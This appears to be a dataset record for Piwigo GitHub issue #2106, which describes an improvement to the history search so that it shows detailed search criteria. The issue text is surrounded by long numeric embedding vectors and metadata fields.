-0.002631882671266794, -0.012708846479654312, 0.003947824239730835, -0.003084237454459071, -0.0005641026073135436, -0.01355991791933775, -0.016291925683617592, -0.014503962360322475, -0.013738714158535004, 0.003268397878855467, -0.02041139453649521, 0.005063513293862343, 0.007645333185791969, 0.019252793863415718, -0.01869495026767254, 0.02025405317544937, -0.004323296714574099, -0.002660490106791258, -0.00010336665582144633, -0.0025889715179800987, -0.021298224106431007, -0.020525824278593063, 0.004806046839803457, -0.004344752058386803, 0.000039307265979005024, 0.005428258329629898, 0.0038047870621085167, -0.01672103814780712, -0.004577187355607748, -0.005042057950049639, -0.0020883416291326284, -0.010749238543212414, -0.00870380736887455, -0.004877565428614616, -0.0031468162778764963, 0.03307017683982849, 0.01286618784070015, 0.014196432195603848, -0.020111016929149628, -0.0053352839313447475, 0.0065510994754731655, -0.01906684599816799, -0.0019613963086158037, 0.010820756666362286, -0.00009923199104378, 0.025746678933501244, 0.0029590800404548645, 0.017421919852495193, -0.016463570296764374, -0.007781218271702528, 0.020768987014889717, -0.017421919852495193, -0.015033199451863766, 0.002358324360102415, -0.024187574163079262, 0.0049169003032147884, 0.016063066199421883, -0.001064732437953353, -0.026833761483430862, 0.014661302790045738, 0.014704214408993721, -0.0025693040806800127, -0.0025174529291689396, -0.0010325490729883313, 0.002118737204000354, 0.002826770767569542, 0.0029483523685485125, -0.006304360460489988, 0.040250640362501144, 0.0180369783192873, 0.028092486783862114, -0.006104108411818743, 0.0047059208154678345, 0.030037792399525642, 0.013824536465108395, 0.006704864092171192, -0.0010093055898323655, -0.02252834476530552, 0.00622568977996707, 0.015076111070811749, 0.007259133271872997, 0.02197049930691719, 0.0003209394926670939, 0.014182128943502903, 0.012687391601502895, -0.0033899794798344374, 0.0002536673564463854, 0.033842578530311584, 0.009755130857229233, 0.007917103357613087, -0.021913284435868263, 0.006332967896014452, -0.013803080655634403, -0.001766508212313056, 0.004266081843525171, -0.025675160810351372, 0.010105571709573269, 0.011214109137654305, 0.02328644134104252, -0.00424462603405118, 0.0001863952202256769, -0.0023154132068157196, 0.017994068562984467, 0.017722297459840775, -0.030466903001070023, 0.014861554838716984, 0.0017432647291570902, 0.004702345002442598, -0.00528522115200758, 0.01295201014727354, 0.0018201471539214253, 0.019910765811800957, -0.0028714698273688555, -0.0034972571302205324, 0.02237100340425968, -0.0033631599508225918, -0.008381973952054977, -0.009976837784051895, 0.00023154131486080587, -0.005331708118319511, 0.0044269985519349575, 0.004859685432165861, 0.012358405627310276, -0.00474883196875453, 0.019438741728663445, 0.007530903443694115, 0.02028266154229641, -0.005031330045312643, -0.004541428294032812, 0.0009047096827998757, 0.01632053405046463, -0.006336543709039688, -0.00933317095041275, -0.009740826673805714, 0.006819293834269047, 0.005850217770785093, 0.0027749198488891125, -0.016063066199421883, 0.00996253453195095, -0.003876305650919676, -0.004670161288231611, 0.018408875912427902, 0.014761429280042648, 0.010127026587724686, 0.02237100340425968, -0.015076111070811749, 0.004888292867690325, -0.018680645152926445, -0.02946564368903637, 0.020196838304400444 ]
null
null
null
null
null
null
null
null
null
[ "Piwigo", "Piwigo" ]
Previously we only had 'details 1' in the search details. So we've enhanced the api and now for the search history we have the search details (Search by words, tags, albums, date posted, author, added by and file types). ![Capture d’écran 2024-02-02 à 11 28 12](https://github.com/Piwigo/Piwigo/assets/137212265/b7264b02-efee-4373-a944-c4cce7ba82e1)
[History search] lines concerning gallery searches have a 'detail 1'
https://api.github.com/repos/Piwigo/Piwigo/issues/2106/comments
0
2024-02-02T10:31:27
2024-02-19T16:13:07Z
https://github.com/Piwigo/Piwigo/issues/2106
2,114,607,323
2,106
false
This is a GitHub Issue repo:Piwigo owner:Piwigo Title : [History search] lines concerning gallery searches have a 'detail 1' Issue date: --- start body --- Previously we only had 'details 1' in the search details. So we've enhanced the api and now for the search history we have the search details (Search by words, tags, albums, date posted, author, added by and file types). ![Capture d’écran 2024-02-02 à 11 28 12](https://github.com/Piwigo/Piwigo/assets/137212265/b7264b02-efee-4373-a944-c4cce7ba82e1) --- end body ---
531
[ -0.00276782363653183, 0.017638733610510826, -0.00997399166226387, 0.039437390863895416, 0.03250964358448982, -0.0011924979044124484, 0.011865610256791115, 0.06282468140125275, -0.029709065333008766, -0.0326734222471714, -0.005306359846144915, 0.007476399186998606, -0.002378854202106595, 0.006616572383791208, 0.011136804707348347, 0.030642591416835785, -0.033164750784635544, 0.016131989657878876, 0.007079241331666708, -0.0315106064081192, -0.029217734932899475, 0.008524568751454353, 0.005932805128395557, 0.037439316511154175, 0.010448943823575974, -0.0059901271015405655, -0.018965324386954308, 0.011054916307330132, -0.023370912298560143, 0.0018076836131513119, 0.023960508406162262, 0.02790752239525318, -0.005478325299918652, -0.0027842011768370867, 0.020390179008245468, -0.050246644765138626, 0.03832371160387993, 0.04667631536722183, -0.01852312684059143, 0.024877656251192093, 0.011300581507384777, -0.02833334170281887, -0.019669562578201294, 0.02833334170281887, -0.03350868076086044, 0.014223992824554443, -0.011300581507384777, 0.02473025768995285, -0.029234113171696663, -0.013052990660071373, 0.016697019338607788, -0.04998460039496422, 0.0026531799230724573, -0.0026163302827626467, -0.026007715612649918, -0.051425833255052567, 0.04503855109214783, -0.004010478034615517, -0.036096349358558655, 0.007656553294509649, 0.025172455236315727, -0.005638007540255785, -0.016385843977332115, 0.013175822794437408, -0.0057895006611943245, -0.000009428346857021097, -0.016705207526683807, -0.0011976159876212478, -0.02438632771372795, 0.02656455524265766, 0.03380347788333893, 0.054865140467882156, 0.05286706984043121, 0.03553951159119606, -0.0027739652432501316, -0.01762235537171364, 0.03832371160387993, 0.01114499382674694, -0.02161850407719612, -0.013315033167600632, -0.012144031003117561, 0.01744220219552517, -0.05250675976276398, 0.03531022369861603, 0.019669562578201294, -0.02918498031795025, -0.019915226846933365, -0.07710599899291992, 0.00012929389777127653, 0.007779385894536972, -0.010850195772945881, -0.030495192855596542, 0.008090561255812645, -0.041631996631622314, 0.01644316501915455, 0.016803473234176636, 0.007906313054263592, 0.017393069341778755, -0.024435460567474365, -0.015354051254689693, -0.015354051254689693, -0.03036417067050934, -0.0007891982095316052, -0.014019272290170193, 0.035342976450920105, 0.008590079843997955, 0.02489403448998928, -0.028054922819137573, -0.032493267208337784, 0.0645279586315155, 0.049919091165065765, -0.01978420652449131, -0.023158002644777298, -0.024681124836206436, 0.012889213860034943, 0.03262428566813469, -0.006649327464401722, -0.005912333261221647, 0.01320857834070921, 0.012520716525614262, -0.010227845050394535, -0.06931023299694061, 0.030577080324292183, 0.014887288212776184, -0.011636323295533657, 0.012569849379360676, -0.010850195772945881, 0.0032632476650178432, -0.0066657052375376225, -0.016885362565517426, 0.0010067139519378543, -0.01207851991057396, 0.01625482179224491, 0.0232235137373209, 0.02515607699751854, 0.002900891937315464, 0.022519275546073914, -0.006174375768750906, -0.013478809967637062, -0.009859347715973854, -0.07428903877735138, -0.04870714247226715, 0.045824676752090454, -0.01988247223198414, -0.04923122748732567, 0.017409445717930794, -0.018080931156873703, -0.02540174126625061, 0.012299618683755398, 0.02230636589229107, 0.004376928322017193, -0.04611947387456894, 0.016041912138462067, -0.0034495433792471886, 0.010064068250358105, -0.006919559091329575, 0.004892824217677116, -0.009957613423466682, -0.017884397879242897, -0.025925826281309128, -0.0205539558082819, -0.014068405143916607, 0.013732663355767727, 0.006280830595642328, 0.0034290712792426348, -0.014731700532138348, 0.018981700763106346, -0.013298654928803444, 0.01211127545684576, 0.011841043829917908, 0.006321774795651436, -0.005564308259636164, 0.025549141690135002, -0.03757033869624138, 0.004786369390785694, -0.014731700532138348, -0.003336947178468108, 0.02070135436952114, -0.04552987962961197, -0.006677988450974226, -0.022257233038544655, -0.03083912283182144, -0.022027945145964622, -0.024599237367510796, 0.029987486079335213, -0.03832371160387993, 0.03283719718456268, 0.04736417531967163, 0.00850819144397974, -0.016222067177295685, 0.014314070343971252, 0.0006980975158512592, 0.0442524217069149, -0.01290559209883213, -0.0046103098429739475, 0.0021229535341262817, 0.003199784317985177, -0.017704244703054428, -0.0026511328760534525, -0.029872842133045197, 0.04811754822731018, -0.024107906967401505, -0.02757997065782547, -0.01601734571158886, -0.010915706865489483, 0.014690755866467953, 0.014322258532047272, 0.017671488225460052, -0.005371870473027229, -0.0343930758535862, -0.015198463574051857, 0.015132952481508255, 0.005224471911787987, 0.0036501698195934296, -0.0006612478173337877, 0.03409827500581741, 0.02153661474585533, -0.010751930065453053, 0.006289019249379635, -0.011161371134221554, 0.016918117180466652, -0.0058181616477668285, 0.004970618057996035, 0.012299618683755398, 0.005601157899945974, -0.007271678652614355, 0.0036215088330209255, 0.004004336427897215, 0.01290559209883213, -0.013224955648183823, -0.040616583079099655, -0.04834683611989021, -0.017393069341778755, 0.0004096972697880119, -0.00859826896339655, -0.042549144476652145, -0.020930642262101173, -0.005203999578952789, 0.016713395714759827, -0.0202755369246006, 0.031215809285640717, 0.02798941172659397, 0.00904865376651287, -0.010178712196648121, 0.04441620036959648, 0.0318545363843441, 0.0002658809826243669, -0.02455010451376438, -0.00913873128592968, 0.01652505248785019, 0.022027945145964622, 0.019571296870708466, -0.0315106064081192, 0.010244222357869148, -0.01291378028690815, 0.004651254042983055, 0.040026988834142685, 0.02910309098660946, -0.025336232036352158, -0.055782292038202286, 0.00871291197836399, 0.02163488231599331, -0.026089603081345558, 0.010432565584778786, -0.029807331040501595, -0.02265029586851597, 0.00783670786768198, -0.017212914302945137, -0.012840081006288528, -0.019980737939476967, 0.014576112851500511, -0.04402313381433487, -0.0068335761316120625, 0.02715415135025978, -0.03779962658882141, 0.006747593637555838, 0.005416909232735634, -0.01644316501915455, 0.00767293106764555, 0.020930642262101173, -0.016836227849125862, 0.028775539249181747, 0.014109348878264427, 0.019145477563142776, -0.02859538421034813, 0.04625049605965614, -0.018293840810656548, -0.005371870473027229, 0.012807325460016727, -0.0056543853133916855, -0.0131185008212924, 0.011087671853601933, -0.06655878573656082, -0.022519275546073914, -0.011284204199910164, 0.007730253040790558, 0.029463401064276695, 0.020390179008245468, 0.017900776118040085, -0.003979770001024008, 0.0023358629550784826, 0.006657516583800316, -0.038946062326431274, -0.004315511789172888, 0.003017582930624485, 0.047822751104831696, 0.015190274454653263, 0.07409250736236572, -0.023108869791030884, -0.016623320057988167, 0.011587190441787243, -0.04156648740172386, 0.006931842304766178, -0.04798652604222298, -0.0075664762407541275, 0.022077077999711037, -0.002088150940835476, 0.006272641476243734, -0.009245186112821102, -0.04854336753487587, -0.00854913517832756, 0.004282756708562374, -0.02933237887918949, -0.003996147774159908, 0.02464837022125721, -0.002679793629795313, 0.012455206364393234, -0.014739888720214367, 0.014592490158975124, 0.003285766812041402, 0.0068949926644563675, -0.03629288077354431, -0.0032673419918864965, 0.007996389642357826, -0.042057815939188004, -0.08647401630878448, 0.002056419150903821, 0.04477650672197342, 0.04323700815439224, -0.05221196264028549, 0.007865368388593197, 0.02699037455022335, -0.01602553389966488, -0.03101927787065506, 0.024779390543699265, 0.006628855597227812, -0.027268795296549797, -0.0065551563166081905, 0.039699435234069824, -0.00637500174343586, 0.0009140778565779328, -0.005150772165507078, -0.017032761126756668, 0.06482275575399399, -0.0061293370090425014, -0.023174380883574486, -0.015362239442765713, -0.014731700532138348, 0.037603095173835754, 0.0019090203568339348, -0.013830929063260555, -0.0479537732899189, 0.029135847464203835, 0.0011628135107457638, 0.03865126520395279, -0.024075152352452278, -0.007447738200426102, -0.005531552713364363, -0.028906559571623802, -0.027383437380194664, -0.0016244585858657956, 0.02505781129002571, -0.05977843701839447, 0.020668599754571915, -0.08287093043327332, 0.026024091988801956, -0.008909444324672222, -0.027792880311608315, 0.004622593056410551, 0.011963876895606518, 0.005531552713364363, 0.013347788713872433, -0.006735310424119234, -0.003723869100213051, 0.013421487994492054, 0.006440512370318174, 0.023403668776154518, -0.01609104499220848, 0.0014043839182704687, -0.019391143694519997, -0.015034686774015427, 0.004037091974169016, -0.003541667712852359, -0.07835070043802261, -0.001334778848104179, 0.015329484827816486, -0.04634876176714897, 0.0035867062397301197, -0.00668617757037282, 0.023911375552415848, 0.056109845638275146, -0.032902706414461136, 0.005302265752106905, 0.004221340641379356, -0.009597305208444595, -0.004000241868197918, 0.01685260608792305, 0.006182564422488213, 0.03180540353059769, 0.03963392227888107, -0.04549712315201759, 0.02271580696105957, -0.06105589494109154, 0.005834539420902729, 0.038847796618938446, 0.022421007975935936, 0.02296147122979164, 0.019833339378237724, -0.02910309098660946, 0.013184011913836002, 0.007406794000416994, 0.007071052212268114, -0.03901157155632973, 0.0038180407136678696, -0.032722555100917816, -0.03992872312664986, -0.0013470620615407825, 0.019669562578201294, 0.06308672577142715, -0.018981700763106346, 0.014969175681471825, 0.01357707567512989, 0.03874953091144562, -0.002575386082753539, 0.033836234360933304, -0.02558189630508423, -0.009122353047132492, -0.011538057588040829, -0.001317377551458776, 0.0032591531053185463, -0.018130064010620117, 0.0187687911093235, -0.01388006191700697, 0.027956655248999596, -0.01257803849875927, 0.0033062389120459557, -0.03665319085121155, 0.022175343707203865, -0.02866089530289173, 0.025106944143772125, 0.016647886484861374, 0.012250485830008984, 0.003541667712852359, -0.035670530050992966, 0.021094419062137604, -0.0005455806385725737, 0.029283246025443077, -0.0011167513439431787, 0.029479777440428734, -0.0017319369362667203, -0.023370912298560143, 0.0038385128136724234, -0.018752414733171463, -0.025794805958867073, 0.02161850407719612, -0.024713881313800812, -0.017131026834249496, -0.024763014167547226, 0.026024091988801956, 0.008225676603615284, 0.012594415806233883, -0.00196941290050745, -0.001923350733704865, 0.03655492514371872, -0.01894894614815712, -0.008573701605200768, -0.012037576176226139, 0.01803179830312729, 0.0010010841069743037, 0.02749808132648468, -0.02717052772641182, -0.021913301199674606, 0.008516380563378334, 0.022699428722262383, -0.007857179269194603, 0.010555398650467396, 0.050770729780197144, -0.02088150940835476, -0.019079966470599174, 0.03956841304898262, -0.033230260014534, 0.014240370132029057, 0.0011894271010532975, 0.011472546495497227, 0.00522037735208869, -0.014158482663333416, -0.04369558021426201, -0.01988247223198414, 0.0284971185028553, -0.017753377556800842, 0.019915226846933365, 0.01827746257185936, 0.04399038106203079, -0.024435460567474365, -0.005461947526782751, 0.02959442138671875, -0.04064933955669403, 0.03234586864709854, 0.006649327464401722, 0.03537573292851448, -0.029152225703001022, -0.02238825336098671, -0.0330173522233963, -0.05224471911787987, -0.021684015169739723, -0.004278662148863077, 0.009580927900969982, -0.021503860130906105, 0.03612910583615303, 0.00213728379458189, 0.016918117180466652, -0.007947256788611412, -0.011660889722406864, 0.027399815618991852, -0.022683050483465195, -0.0004984948318451643, -0.020259158685803413, 0.016123801469802856, 0.003942920360714197, -0.03422929719090462, -0.004622593056410551, 0.006604289170354605, 0.030986521393060684, 0.031969182193279266, 0.008729290217161179, 0.034753382205963135, -0.002530347555875778, 0.012479772791266441, 0.013421487994492054, -0.021421972662210464, -0.02859538421034813, 0.01374904066324234, -0.018899813294410706, -0.010653664357960224, 0.01324952207505703, 0.002861995017156005, 0.002782154129818082, 0.03326301649212837, -0.022339120507240295, -0.012119464576244354, -0.023698465898633003, -0.011308770626783371, -0.008098750375211239, -0.0038385128136724234, -0.010424377396702766, 0.03632563725113869, 0.033574189990758896, 0.00817654374986887, 0.025860317051410675, 0.027367061004042625, 0.00897495448589325, 0.030315037816762924, 0.03901157155632973, 0.011931121349334717, 0.008393547497689724, -0.008770233951508999, 0.00930250808596611, -0.018834302201867104, -0.029741819947957993, -0.015444127842783928, 0.002753493143245578, -0.017835265025496483, -0.03280444070696831, -0.014191237278282642, -0.004872352350503206, 0.0026368023827672005, 0.03360694646835327, 0.007472304627299309, -0.023501934483647346, -0.011169560253620148, 0.012700870633125305, -0.003373796818777919, -0.02816956490278244, 0.028398852795362473, 0.02145472727715969, -0.027629103511571884, 0.023403668776154518, -0.0005824303370900452, -0.01525578461587429, -0.006546967197209597, -0.00847543589770794, 0.025974959135055542, 0.02531985379755497, -0.0036153672263026237, -0.011832855641841888, 0.006031071301549673, -0.0014105255249887705, 0.013151256367564201, 0.05719076842069626, -0.01953854225575924, -0.007476399186998606, 0.02581118419766426, 0.03606359660625458, -0.027432570233941078, 0.0022723996080458164, 0.004925579763948917, 0.03429480642080307, 0.011038538999855518, 0.011996631510555744, 0.023403668776154518, -0.046741824597120285, 0.011120427399873734, 0.039699435234069824, -0.023256268352270126, 0.01253709476441145, -0.0006228626589290798, 0.00012833427172154188, -0.0025385364424437284, -0.0047454251907765865, -0.02446821518242359, 0.05204818397760391, -0.021733148023486137, 0.02943064458668232, -0.00572399003431201, -0.013110312633216381, 0.018162818625569344, -0.0030708101112395525, -0.023960508406162262, 0.01228324044495821, -0.006235791835933924, -0.02489403448998928, -0.026040470227599144, -0.0052408492192626, -0.03481889143586159, -0.0311011653393507, -0.013274088501930237, -0.0023460988886654377, 0.014756266959011555, -0.014092971570789814, -0.03154336288571358, -0.028628140687942505, -0.016467731446027756, -0.007308528292924166, 0.05928710848093033, -0.003564187092706561, -0.035080935806035995, 0.008282998576760292, 0.004487477242946625, 0.006256264168769121, 0.00884393323212862, -0.008778423070907593, -0.03678421303629875, 0.02238825336098671, 0.02355106733739376, 0.030970145016908646, -0.04533334821462631, 0.023747598752379417, 0.028611762449145317, -0.012307806871831417, -0.02522158809006214, -0.0011955688241869211, -0.007488682400435209, -0.0013409204548224807, 0.002172086387872696, 0.0070382971316576, 0.016467731446027756, 0.021258195862174034, -0.018261084333062172, 0.0052531324326992035, 0.031002899631857872, 0.018261084333062172, -0.032722555100917816, 0.001499578938819468, -0.024091528728604317, 0.004872352350503206, 0.014395957812666893, 0.009155108593404293, -0.007611515000462532, -0.02558189630508423, -0.020226404070854187, 0.006444606930017471, -0.003959298133850098, -0.0202755369246006, -0.030888255685567856, -0.0044096834026277065, 0.009056842885911465, -0.003924495540559292, -0.00900771003216505, -0.0032734835986047983, -0.02161850407719612, 0.009916669689118862, -0.02212621085345745, -0.005081167444586754, 0.03979770094156265, 0.0166806410998106, -0.03472062572836876, 0.0310356542468071, 0.017589600756764412, -0.015485072508454323, 0.014191237278282642, -0.04156648740172386, 0.003977722954005003, 0.015992779284715652, 0.005302265752106905, -0.008721101097762585, 0.01921098865568638, -0.009114164859056473, -0.018293840810656548, 0.009892103262245655, 0.011890176683664322, -0.0000194964468391845, 0.017311180010437965, 0.011734589003026485, 0.030740857124328613, -0.036587681621313095, -0.002049254020676017, -0.01047351025044918, 0.010751930065453053, -0.007238923106342554, 0.011791910976171494, 0.018392106518149376, -0.007771196775138378, -0.04176301881670952, -0.01517389714717865, -0.03101927787065506, 0.013044801540672779, 0.017884397879242897, 0.00522037735208869, 0.0018516985001042485, 0.018572259694337845, -0.04684009030461311, -0.0038835513405501842, -0.0073986053466796875, 0.018130064010620117, -0.041697509586811066, 0.026368023827672005, -0.0024730258155614138, 0.0015466647455468774, -0.00490510743111372, 0.0017657158896327019, -0.013421487994492054, -0.012135841883718967, -0.008770233951508999, -0.010293356142938137, -0.00423362385481596, 0.00019909086404368281, -0.0014627292985096574, 0.000510010402649641, 0.009654627181589603, -0.03247688710689545, 0.004426061175763607, -0.021815035492181778, 0.023763976991176605, -0.05401350557804108, 0.006010598968714476, -0.02658093348145485, 0.04277843236923218, -0.02230636589229107, 0.02513969875872135, -0.04399038106203079, 0.008737478405237198, 0.007087429985404015, -0.00800457876175642, 0.005736273247748613, 0.004982901271432638, 0.02515607699751854, 0.011063105426728725, 0.03000386245548725, 0.003904023440554738, -0.035506755113601685, 0.0024996395222842693, 0.011865610256791115, -0.014183049090206623, -0.0000774100044509396, -0.0018005183665081859, 0.004724953323602676, 0.027973033487796783, 0.02389499731361866, -0.04074760526418686, 0.010293356142938137, -0.010391621850430965, -0.028038544580340385, -0.045562636107206345, 0.026973996311426163, 0.006010598968714476, -0.02012813650071621, 0.002001144690439105, 0.011046728119254112, 0.010891140438616276, -0.02640077844262123, 0.026695577427744865, -0.020815998315811157, 0.0018895718967542052, -0.004010478034615517, 0.011341525241732597, -0.030953766778111458, 0.0024648369289934635, 0.01030973345041275, -0.014142104424536228, -0.021520238369703293, -0.010285167023539543, -0.027055885642766953, 0.009097786620259285, -0.021520238369703293, -0.030658969655632973, -0.02063584513962269, 0.002907033544033766, 0.015231218189001083, -0.01370809692889452, 0.01693449541926384, -0.0118164774030447, 0.022502897307276726, -0.0066984607838094234, -0.022109832614660263, -0.002196652814745903, 0.017458580434322357, -0.008737478405237198, -0.03963392227888107, -0.010186901316046715, 0.017245670780539513, -0.003949061967432499, 0.037275541573762894, -0.0021679920610040426, -0.041304443031549454, -0.010915706865489483, -0.03770136088132858, -0.007013730704784393, 0.012954724952578545, 0.02574567310512066, -0.007144751492887735, -0.0007380180759355426, -0.025008678436279297, -0.0049132960848510265, -0.0034782043658196926, -0.005736273247748613, 0.0035089123994112015, 0.019227366894483566, 0.011931121349334717, -0.0307572353631258, 0.042549144476652145, -0.00639137951657176, -0.015640659257769585, -0.04769172891974449, 0.0026286134961992502, 0.007316716946661472, -0.021323705092072487, -0.02432081662118435, -0.00138800626154989, 0.011431602761149406, 0.02648266777396202, 0.023272646591067314, 0.0036153672263026237, -0.004835502244532108, 0.05191716551780701, -0.0021147646475583315, -0.00769340293481946, -0.021864168345928192, 0.021847790107131004, -0.01870328187942505, -0.043302517384290695, 0.011783722788095474, 0.010555398650467396, 0.0010522642405703664, -0.001181238330900669, 0.018146440386772156, -0.010760119184851646, 0.002241691341623664, -0.03737380728125572, 0.0016357182757928967, -0.010973028838634491, -0.010629097931087017, -0.01594364643096924, 0.008434492163360119, -0.013175822794437408, 0.029479777440428734, 0.007312622852623463, 0.004360550548881292, 0.007664742413908243, -0.00302781886421144, -0.04936224967241287, -0.0180154200643301, -0.02908671461045742, -0.031821783632040024, -0.020766865462064743, -0.013699907809495926, -0.0020083098206669092, -0.004340078216046095, -0.0051180170848965645, 0.02422255091369152, -0.023698465898633003, 0.001120845670811832, 0.013757229782640934, -0.02381310984492302, -0.03283719718456268, -0.008201110176742077, 0.0029172697104513645, 0.006997352931648493, 0.007386322133243084, -0.022764939814805984, 0.010203278623521328, -0.003959298133850098, 0.00016121754015330225, -0.0031445096246898174, -0.016787094995379448, -0.020684977993369102, 0.015223030000925064, 0.022748561576008797, -0.033000972121953964, 0.0144205242395401, -0.0009258492500521243, -0.011628134176135063, -0.002516017062589526, -0.011079482734203339, 0.012176785618066788, 0.004855974577367306, -0.031658004969358444, -0.024353571236133575, -0.011423413641750813, -0.03488440439105034, 0.015485072508454323, 0.01862139254808426, 0.007857179269194603, 0.013265900313854218, 0.03845473378896713, -0.00881117768585682, -0.003992053214460611, -0.022846827283501625, 0.002530347555875778, 0.015092008747160435, -0.0064937397837638855, -0.02012813650071621, -0.02179865725338459, 0.0009325026767328382, 0.005056601017713547, 0.003486393252387643, -0.036260128021240234, 0.01576349325478077, -0.0070382971316576, 0.008729290217161179, -0.045071303844451904, 0.028464363887906075, 0.026613688096404076, -0.0031342736911028624, -0.02766185812652111, 0.004536610096693039, -0.01693449541926384, 0.006755782291293144, -0.02197881229221821, 0.017736999318003654, -0.002031852724030614, -0.013781796209514141, 6.277567763390834e-7, -0.030216772109270096, -0.031379584223032, 0.0018977606669068336, -0.00010146468412131071, -0.020848754793405533, -0.026842975988984108, -0.0008373075979761779, 0.013126689940690994, 0.015796247869729996, 0.030806368216872215, -0.015632471069693565, 0.01127601508051157, -0.0031281320843845606, 0.01594364643096924, -0.01793353073298931, 0.028906559571623802, -0.03806166723370552, 0.01061271969228983, 0.020930642262101173, 0.02112717367708683, 0.005580685567110777, -0.024124285206198692, 0.0101050129160285, 0.029299624264240265, -0.018965324386954308, -0.006022882182151079, -0.016197500750422478, -0.01211127545684576, -0.02699037455022335, -0.012848270125687122, 0.039371881633996964, -0.009564550593495369, 0.01370809692889452, -0.02088150940835476, 0.02984008565545082, 0.024697503075003624, 0.0006121148471720517, 0.014633433893322945, -0.006645233370363712, 0.011423413641750813, 0.008942198939621449, -0.030380548909306526, 0.01668882928788662, -0.02558189630508423, 0.02297784946858883, 0.004986995831131935, 0.010678230784833431, -0.005973749328404665, -0.007889934815466404, -0.014821777120232582, 0.016213877126574516, -0.040878623723983765, 0.025287099182605743, 0.05175338685512543, 0.0131185008212924, 0.029807331040501595, -0.018473993986845016, 0.00572399003431201, 0.0015824908623471856, 0.023829486221075058, 0.019554918631911278, -0.0013583217514678836, 0.007480493746697903, 0.026842975988984108, -0.011349714361131191, -0.03262428566813469, -0.013388732448220253, 0.009728326462209225, -0.03501542657613754, 0.004524326883256435, -0.007717969827353954, -0.0026122359558939934, 0.0012344657443463802, 0.010768307372927666, -0.016705207526683807, 0.01278275903314352, 0.0374065637588501, 0.02825145423412323, 0.0015190273988991976, -0.00951541680842638, 0.009662816300988197, -0.009851159527897835, -0.01370809692889452, -0.04166475310921669, -0.019669562578201294, -0.050246644765138626, -0.022273609414696693, 0.009408961981534958, 0.027891146019101143, -0.013069367967545986, -0.0008280951296910644, -0.011865610256791115, -0.02079962193965912, 0.009703760035336018, -0.00787355750799179, 0.020079003646969795, 0.005838633980602026, -0.016303954645991325, 0.004090319387614727, 0.0077630081214010715, 0.025958582758903503, -0.005670762620866299, -0.01650867611169815, 0.013978327624499798, -0.012021197937428951, -0.019554918631911278, 0.0005251085385680199, 0.0065224007703363895, 0.012062142603099346, -0.018048174679279327, 0.005208094138652086, 0.0018158723833039403, -0.020668599754571915, -0.01860501617193222, 0.00536777637898922, -0.01734393648803234, 0.002141378354281187, -0.017835265025496483, 0.00400638347491622, -0.009744704701006413, 0.014756266959011555, 0.021569371223449707, -0.003564187092706561, -0.023665711283683777, -0.0015865853056311607, -0.023600200191140175, 0.008614646270871162, -0.00951541680842638, 0.02214258909225464, -0.005502891726791859, 0.029643554240465164, 0.02245376445353031, 0.0010594294872134924, 0.005560213699936867, -0.007640175987035036, -0.0022519275080412626, 0.0025139700155705214, -0.019554918631911278, -0.02641715668141842, 0.0035580454859882593, -0.004663537256419659, -0.01391281746327877, -0.02373122051358223, -0.006624761037528515, 0.00519990548491478, 0.05447207763791084, 0.003300097305327654, -0.013511564582586288, 0.003979770001024008, 0.0011556482641026378, -0.004966523498296738, 0.006452796049416065, 0.001149506657384336, -0.010817441157996655, 0.0023727125953882933, 0.007513248827308416, 0.031723517924547195, 0.004520232789218426, 0.007906313054263592, 0.0016316238325089216, -0.021864168345928192, -0.006235791835933924, -0.006366813089698553, 0.02063584513962269, 0.01455154549330473, -0.005187621805816889, 0.021651258692145348, 0.0250741895288229, 0.006239886395633221, -0.013495187275111675, 0.01077649649232626, 0.004868257790803909, 0.005154866725206375, 0.020914264023303986, -0.0063586244359612465, 0.0068908981047570705, -0.0310356542468071, -0.010178712196648121, -0.0006387284956872463, -0.007955445908010006, 0.006063826382160187, 0.011054916307330132, 0.012831891886889935, -0.049263983964920044, -0.02053757943212986, -0.010629097931087017, -0.0016418598825111985, -0.006935936398804188, -0.005539741367101669, 0.010113202035427094, -0.016140177845954895, 0.007300339639186859, 0.002702313009649515, -0.03083912283182144, -0.007251206319779158, -0.0026531799230724573, -0.00555611914023757, 0.0043523614294826984, 0.014985553920269012, 0.011587190441787243, 0.0013890297850593925, 0.022109832614660263, 0.023829486221075058, 0.011791910976171494, 0.0003395804378669709, -0.002800578949972987, -0.01324952207505703, 0.03586706146597862, -0.009441717527806759, 0.0002912151685450226, 0.01819557324051857, -0.008156071417033672, -0.006010598968714476, -0.015329484827816486, -0.0027801068499684334, -0.009490850381553173, 0.0027453042566776276, 0.012627171352505684, -0.004892824217677116, -0.004393305629491806, 0.016656074672937393, 0.018424861133098602, 0.013552509248256683, 0.009114164859056473, -0.015960024669766426, -0.027399815618991852, -0.008393547497689724, -0.04477650672197342, 0.004430155735462904, -0.023665711283683777, 0.02656455524265766, -0.021765902638435364, -0.012618983164429665, -0.009376207366585732, -0.002595858182758093, -0.0037648133002221584, -0.020210025832057, 0.02466474659740925, 0.000038353140553226694, 0.03796340152621269, 0.010637286119163036, 0.005597063340246677, 0.016885362565517426, -0.01986609399318695, 0.009531795047223568, 0.018408482894301414, -0.00336356065236032, -0.006960503291338682, -0.013716285116970539, -0.038028914481401443, -0.01695087179541588, -0.0036419809330254793, 0.012103086337447166, 0.007099713198840618, -0.03237862139940262, -0.024206172674894333, -0.027727369219064713, 0.015526016242802143, -0.02271580696105957, -0.029905596747994423, -0.010874762199819088, 0.00213728379458189, 0.004696292337030172, 0.024255305528640747, 0.008111033588647842, 0.0048887296579778194, -0.01501012034714222, 0.0021454726811498404, -0.037013497203588486, 0.021847790107131004, 0.02355106733739376, -0.018080931156873703, -0.008753856644034386, 0.02255203016102314, -0.014903665520250797, -0.009220619685947895, 0.003672688966616988, 0.009736515581607819, -0.006411851849406958, 0.016705207526683807, -0.002239644294604659, -0.005375965032726526, -0.0180154200643301, -0.011881988495588303, -0.010907517746090889, -0.0419267937541008, 0.020259158685803413, 0.025385364890098572, 0.04258190095424652, 0.010637286119163036, 0.001664379145950079, 0.01421580370515585, -0.011734589003026485, -0.024763014167547226, 0.01044075470417738, -0.033574189990758896, -0.020766865462064743, 0.006518306210637093, -0.0006863260641694069, 0.019227366894483566, -0.004495665896683931, 0.007898123934864998, 0.014895476400852203, -0.004507949575781822, 0.013143067248165607, -0.007271678652614355, 0.0010036431485787034, -0.001177143887616694, -0.0033656079322099686, -0.007914501242339611, -0.0012273004977032542, -0.004544799216091633, -0.029823709279298782, -0.023452801629900932, 0.0021987000945955515, 0.0021086230408400297, -0.0029520723037421703, -0.008082372136414051, 0.000029620523491757922, 0.008115127682685852, 0.00913873128592968, 0.0042418125085532665, 0.008237959817051888, -0.027055885642766953, 0.0021598031744360924, -0.014486035332083702, -0.003895834553986788, -0.022339120507240295, 